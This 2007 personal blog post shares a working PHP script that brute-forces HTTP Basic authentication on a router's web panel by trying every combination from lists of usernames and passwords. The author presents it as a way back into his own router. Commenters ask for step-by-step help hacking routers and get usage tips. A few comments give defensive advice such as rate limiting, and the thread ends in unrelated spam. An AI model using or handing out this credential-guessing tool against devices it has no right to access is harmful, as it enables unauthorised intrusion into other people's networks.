Wed, 28 Nov 2007

Hacking into my router by brute-forcing http authentication

I forgot the username and password to access the web panel of my router.
Luckily I knew some possible usernames and some patterns that I could have used to construct my password, so I just had to try all the combinations... Too much work to do manually but easily done when scripted.

Here is the php script that I came up with. (obviously stripped of my personal stuff). It got my account in less then a second :)

::Read from here

DISCLAIMER: Don't use this code for anything illegal! I'm not responsible for what you do with this!

<?php
$host = '';
$port = '';
$url = '/';
$users = array();
$passes = array();
tryme($host,$url,$port);
foreach($users as $user) {
   foreach($passes as $pass) {
      tryme($host,$url,$port,$user,$pass);
   }
}

function tryme($host,$url = '/',$port = 80, $user = null,$pass =null ) {
   $result="FAIL";
   if(tryAccess($host,$url,$port, $user,$pass)) $result="SUCCESS";
   if($user && $pass) $userpass = "user $user pass $pass ";
   else $userpass = " without username & password";
   echo("Tried $userpass > $result\n");
}

function tryAccess($host,$url = '/',$port = 80, $user = null,$pass =null)  {
   $fp = @fsockopen ($host, $port, &$errno, &$errdesc);
   if (!is_resource ($fp)) {
      echo("Could't not open socket to server: $errno - $errdesc\n");
      return false;
   }
   @fputs ($fp, "POST $url HTTP/1.1\r\n");
   @fputs ($fp, "Host: $host\r\n");
   @fputs ($fp, "Connection: close\r\n");
   if($user && $pass) {
      @fputs ($fp, "Authorization: Basic " . base64_encode ("$user:$pass") . "\r\n");
   }
   @fputs($fp,"\r\n");
        
   $reply = '';
   $success = true;
   while (!@feof ($fp)) {
      $line = @fgets ($fp, 1024);
      if(strpos($line,'401 Unauthorized')) $success = false;
      $reply .= $line; 
   }
   @fclose ($fp);
   return $success;
}
?>

Comments

On most (if not all) routers, there's a way to reset it to factory settings though.. For routers that have defense mechanisms against brute force attacks (why does'nt yours?), that's the only way to do it.

Yes, my router has a password reset functionality, but then I would need to search my null-modem cable (because it's via a serial interface), go downstairs, connect my laptop, figure out the serial settings ( I always forget them), ...
It's so much more fun to leave my laptop and lazy ass where they belong and hack a script together and learn something from it :-)

About the brute force protection, it seems like it doesn't have any, which is okay for me since it only listens on the LAN (and runs on a custom port).

I just found out there is a new version of the software which supports doing a full reset triggered by a hardware button, but then I lose all my settings (which I can restore because I have backups :-) but this would also mean my internet connection has to go down for a while ...
And my initial point - the coolness factor and the educational value - remains ;-)

Hey, sorry ima being abit thick how would you modify this to work to crack your passwords?

please explain a litte?

Thanks,
Dan

The key is filling the $users and $passes arrays ( or if they are really big then change how the looping works so you don't waste your ram )

I recently had the same sort of problem. My router is inside a sort of hole in my roof, and I forgot the password. I haven't needed to access it for any reasons lately, but it would be nice to get back in. I have NO idea what it was. So is there a way for it to just test all possible solutions but having it connect together letters from the alphabet?

Also how do you use this script?

what router do you use?

It's a little embedded box, based on the pc engines WRAP 1E-2 board, running m0n0wall. (but this trick works on any device that uses http authentication)

@ the other anonymous commenter: it's a php script. save it as a file and run it as

php filename.php

Could you tell what to change for the passes Array()? I dont fully understand php, but I do wanna access my router again!

ya dude...
how do u actually use the script

Anonymous 1: Well I don't know how you construct your passwords... whether you use a fixed string, a random one, a combination thereof etc. You obviously need to know a little php.
Anonymous 2: Run it from the php command-line. (/usr/bin/php)

The password losing cases are common when you just tend to forget your password. In the scenarios where you use the login frequently you tend to remember but when you have a break for many days you need to have it written somewhere.
Also I have realized pre storing the password for logins is not really good idea, as you just keep logging in becasue the system knows the details but due to any reason if you are required to retype it, it is a problem..
my experience with passwords.

I was wondering if a hacker or any of my assistants could use this to get into my router, I have not provided them the access due to critical information but always be concerned if I am safe with my router?

Thanks for sharing was very useful.. I run a web company and have many routers to handle.

I think you shouldn't have shared this script.. the script might reach the wrong hands.. :(

That's a bit worrying how easy it could be to hack into other peoples routers. Any advise on how to make it more secure?

1) rate limiting: only allow max 4 requests in a 5 minute time span or so.
2) if you only login from one of the networks (eg the LAN), only expose the interface on the relevant subnet/port.

Most consumer routers support option 2 , but not option 1.

Can you give me a step by step on how to hack into a router.
I am new at this and I would like to learn.
Thanks

Losing your password is common. I realized that storing the password for logins is not a good idea, as you just keep logging in because the system knows the details, but if for any reason you are required to retype it, this is going to be a problem.
my 2 cents about passwords lost.

for those who can't understand this...

$users = array('admin','admin2');
$passes = array('password','password2');

etc....etc...

How do you actually put this script into effect. What do i need to do with the script in order to activate it and crack the password and username

Thank you for another important article. Where else can you get this information in a comprehensive way of writing? It took me a week, and I am looking for information.
Hi, Dieter it was so thoughtful of you to post this code snippet. I too forgot the password to my router and thanks to you, I was able to hack into it and make it working. Regards..
I just want to say your article is striking. Well with your permission allow me to grab feed to keep up to date with forthcoming post. Thanks.
This is a really good read for me. Must agree that you are one of the coolest Article I ever saw. Thanks for posting this useful information.
This site helps us in telling more about nature and its herbs how it can benefit the humans to kill various diseases. Let the nature blossom.
Tourism guide to help you plan where to go, when to visit, and what to do.
Read travelalones's reviews to find the best travel destinations, hotels and restaurants. Plan your trip online with.
Choose from the best vacation destinations in the world.
Taste good wine,know more wine knowledge,and enjoy the feeling of bouquet lingering on the tip of the nose.
Guide to grape wine and liquor,including famous grape wine,new products and trends.
new products and trends, offers a range of wines from around the world.


Name:


E-mail:


URL:


Comment:


What is the first name of the guy blogging here?


This comment form is pretty crude. Make sure mandatory fields are entered correctly.
Basic html tags (a,i,b, etc) are allowed, others are sanitized